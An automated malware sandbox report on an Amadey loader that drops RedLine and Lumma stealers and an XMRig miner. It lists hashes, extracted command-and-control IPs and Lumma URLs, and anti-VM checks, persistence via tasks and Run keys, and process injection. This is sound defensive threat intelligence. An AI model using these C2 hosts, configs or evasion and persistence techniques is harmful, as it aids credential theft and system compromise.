amadey | 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
23-06-2024 22:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
Size

1.8MB
MD5

4eef36b2c02ad8525ba1cfe7790dffbb
SHA1

446809be411edad4e9d44fc6633cda3c2e1920ec
SHA256

79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044
SHA512

17e620916713ed5329e7f3895fcecfe2374cee0b2f079599f1e83f62d422fdcb0b03160a37f64415b7ebc2577014ed1999fda59c65e277ec030f368523bbbb98
SSDEEP

49152:3hY+1pbKJX0Sts3BGqlbVLQmLSHECH/DjzuwH3D:3hN1pbG0amGk3L2H/3zvH3D

Score

10^/10

amadey lumma redline xmrig ama e76b71 livetraffic discovery evasion execution infostealer miner persistence spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

185.215.113.67:40960

Extracted

Family

redline

Botnet

LiveTraffic

4.185.27.237:13528

Extracted

Family

lumma

https://parallelmercywksoffw.shop/api

https://liabiliytshareodlkv.shop/api

https://notoriousdcellkw.shop/api

https://conferencefreckewl.shop/api

https://flourhishdiscovrw.shop/api

https://landdumpycolorwskfw.shop/api

https://barebrilliancedkoso.shop/api

https://facilitycoursedw.shop/api

https://publicitycharetew.shop/api

https://computerexcudesp.shop/api

https://leafcalfconflcitw.shop/api

https://injurypiggyoewirog.shop/api

https://bargainnygroandjwk.shop/api

https://disappointcredisotw.shop/api

https://doughtdrillyksow.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe	family_redline
behavioral1/memory/3136-41-0x0000000000B70000-0x0000000000BC0000-memory.dmp	family_redline
behavioral1/memory/4884-67-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

XMRig Miner payload 9 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/5452-613-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/5452-616-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/5452-617-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/5452-618-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/5452-624-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/5452-615-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/5452-612-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/5452-636-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/5452-637-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

65 3648 powershell.exe
79 3648 powershell.exe
89 2528 powershell.exe
92 2528 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3648 powershell.exe
2528 powershell.exe
2320 powershell.exe
400 powershell.exe
3136 powershell.exe
5856 powershell.exe
Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

flow	pid	process
65	3648	powershell.exe
79	3648	powershell.exe
89	2528	powershell.exe
92	2528	powershell.exe

pid	process
3648	powershell.exe
2528	powershell.exe
2320	powershell.exe
400	powershell.exe
3136	powershell.exe
5856	powershell.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

axplong.exe79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exeaxplong.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Hkbsse.exeama.exe79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exeNewLatest.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	Hkbsse.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	ama.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	axplong.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	NewLatest.exe

Executes dropped EXE 17 IoCs

Processes:

axplong.exeama.exegold.exelummac2.exeNewLatest.exeHkbsse.exeInstaller.exe1.exeHkbsse.exeaxplong.exelegs.exeFirstZ.exetaskweaker.exe6.exereakuqnanrkn.exeaxplong.exeHkbsse.exe

pid	process
3668	axplong.exe
3136	ama.exe
2388	gold.exe
2072	lummac2.exe
4152	NewLatest.exe
3420	Hkbsse.exe
884	Installer.exe
2752	1.exe
4740	Hkbsse.exe
2492	axplong.exe
3748	legs.exe
3152	FirstZ.exe
2124	taskweaker.exe
992	6.exe
5836	reakuqnanrkn.exe
6000	axplong.exe
5860	Hkbsse.exe

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplong.exeaxplong.exe79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Wine	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
Key opened	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Software\Wine	axplong.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/5452-609-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-610-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-613-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-616-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-617-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-618-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-624-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-615-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-612-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-611-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-608-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-607-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-636-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5452-637-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Installer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Installer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

207 pastebin.com
209 pastebin.com
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid process

5388 powercfg.exe
5384 powercfg.exe
5380 powercfg.exe
5348 powercfg.exe
5488 powercfg.exe
5496 powercfg.exe
5512 powercfg.exe
5504 powercfg.exe

flow	ioc
207	pastebin.com
209	pastebin.com

pid	process
5388	powercfg.exe
5384	powercfg.exe
5380	powercfg.exe
5348	powercfg.exe
5488	powercfg.exe
5496	powercfg.exe
5512	powercfg.exe
5504	powercfg.exe

Drops file in System32 directory 4 IoCs

Processes:

powershell.exereakuqnanrkn.exeFirstZ.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exeaxplong.exeaxplong.exe

pid process

3468 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
3668 axplong.exe
2492 axplong.exe
6000 axplong.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

gold.exelegs.exetaskweaker.exereakuqnanrkn.exe

description	pid	process	target process
PID 2388 set thread context of 4884	2388	gold.exe	RegAsm.exe
PID 3748 set thread context of 3128	3748	legs.exe	RegAsm.exe
PID 2124 set thread context of 6052	2124	taskweaker.exe	BitLockerToGo.exe
PID 5836 set thread context of 5364	5836	reakuqnanrkn.exe	conhost.exe
PID 5836 set thread context of 5452	5836	reakuqnanrkn.exe	explorer.exe

Drops file in Windows directory 2 IoCs

Processes:

79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeNewLatest.exe

description ioc process

File created C:\Windows\Tasks\axplong.job 79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
File created C:\Windows\Tasks\Hkbsse.job NewLatest.exe
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5696 sc.exe
2288 sc.exe
5748 sc.exe
5260 sc.exe
5520 sc.exe
992 sc.exe
5340 sc.exe
5348 sc.exe
5396 sc.exe
5440 sc.exe
5216 sc.exe
5220 sc.exe
5300 sc.exe
5756 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2528 2752 WerFault.exe 1.exe
4668 3748 WerFault.exe legs.exe

description	ioc	process
File created	C:\Windows\Tasks\axplong.job	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
File created	C:\Windows\Tasks\Hkbsse.job	NewLatest.exe

pid	process
5696	sc.exe
2288	sc.exe
5748	sc.exe
5260	sc.exe
5520	sc.exe
992	sc.exe
5340	sc.exe
5348	sc.exe
5396	sc.exe
5440	sc.exe
5216	sc.exe
5220	sc.exe
5300	sc.exe
5756	sc.exe

pid	pid_target	process	target process
2528	2752	WerFault.exe	1.exe
4668	3748	WerFault.exe	legs.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 52 IoCs

Processes:

powershell.exeexplorer.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133636569952530472"	msedge.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe

Modifies registry class 2 IoCs

Processes:

msedge.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3665033694-1447845302-680750983-1000\{644AD728-25DA-489F-93C8-21460868F2B9}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2492 reg.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3932 schtasks.exe
2560 schtasks.exe
5040 schtasks.exe
5000 schtasks.exe
3864 schtasks.exe

pid	process
2492	reg.exe

pid	process
3932	schtasks.exe
2560	schtasks.exe
5040	schtasks.exe
5000	schtasks.exe
3864	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exeama.exepowershell.exeaxplong.exepowershell.exepowershell.exeRegAsm.exepowershell.exe6.exeFirstZ.exepowershell.exereakuqnanrkn.exepowershell.exe

pid	process
3468	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
3468	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
3668	axplong.exe
3668	axplong.exe
3136	ama.exe
3136	ama.exe
3648	powershell.exe
3648	powershell.exe
3648	powershell.exe
2492	axplong.exe
2492	axplong.exe
400	powershell.exe
400	powershell.exe
400	powershell.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
3128	RegAsm.exe
3128	RegAsm.exe
3128	RegAsm.exe
3128	RegAsm.exe
3128	RegAsm.exe
3128	RegAsm.exe
3128	RegAsm.exe
3128	RegAsm.exe
3128	RegAsm.exe
3128	RegAsm.exe
3128	RegAsm.exe
3128	RegAsm.exe
2320	powershell.exe
2320	powershell.exe
2320	powershell.exe
3136	ama.exe
3136	ama.exe
992	6.exe
992	6.exe
3152	FirstZ.exe
3136	powershell.exe
3136	powershell.exe
3136	powershell.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
3152	FirstZ.exe
5836	reakuqnanrkn.exe
5856	powershell.exe
5856	powershell.exe
5856	powershell.exe
5836	reakuqnanrkn.exe
5836	reakuqnanrkn.exe
5836	reakuqnanrkn.exe
5836	reakuqnanrkn.exe
5836	reakuqnanrkn.exe
5836	reakuqnanrkn.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

Processes:

msedge.exe

pid process

2136 msedge.exe
2136 msedge.exe
2136 msedge.exe
2136 msedge.exe
2136 msedge.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

ama.exepowershell.exepowershell.exepowershell.exeRegAsm.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	3136	ama.exe
Token: SeDebugPrivilege	3648	powershell.exe
Token: SeDebugPrivilege	400	powershell.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	3128	RegAsm.exe
Token: SeBackupPrivilege	3128	RegAsm.exe
Token: SeSecurityPrivilege	3128	RegAsm.exe
Token: SeSecurityPrivilege	3128	RegAsm.exe
Token: SeSecurityPrivilege	3128	RegAsm.exe
Token: SeSecurityPrivilege	3128	RegAsm.exe
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeShutdownPrivilege	5488	powercfg.exe
Token: SeCreatePagefilePrivilege	5488	powercfg.exe
Token: SeShutdownPrivilege	5496	powercfg.exe
Token: SeCreatePagefilePrivilege	5496	powercfg.exe
Token: SeShutdownPrivilege	5504	powercfg.exe
Token: SeCreatePagefilePrivilege	5504	powercfg.exe
Token: SeShutdownPrivilege	5512	powercfg.exe
Token: SeCreatePagefilePrivilege	5512	powercfg.exe
Token: SeDebugPrivilege	5856	powershell.exe
Token: SeShutdownPrivilege	5380	powercfg.exe
Token: SeCreatePagefilePrivilege	5380	powercfg.exe
Token: SeShutdownPrivilege	5384	powercfg.exe
Token: SeCreatePagefilePrivilege	5384	powercfg.exe
Token: SeShutdownPrivilege	5388	powercfg.exe
Token: SeCreatePagefilePrivilege	5388	powercfg.exe
Token: SeLockMemoryPrivilege	5452	explorer.exe
Token: SeShutdownPrivilege	5348	powercfg.exe
Token: SeCreatePagefilePrivilege	5348	powercfg.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exemsedge.exe

pid	process
3468	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe
2136	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exeaxplong.exegold.exeNewLatest.exeInstaller.execmd.exeHkbsse.exepowershell.execmd.exelegs.exe

description	pid	process	target process
PID 3468 wrote to memory of 3668	3468	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe	axplong.exe
PID 3468 wrote to memory of 3668	3468	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe	axplong.exe
PID 3468 wrote to memory of 3668	3468	79674ce23e458fd01cf6cb11bcfb10594f32f1dd7ff56567035f7a06edd56044.exe	axplong.exe
PID 3668 wrote to memory of 3136	3668	axplong.exe	ama.exe
PID 3668 wrote to memory of 3136	3668	axplong.exe	ama.exe
PID 3668 wrote to memory of 3136	3668	axplong.exe	ama.exe
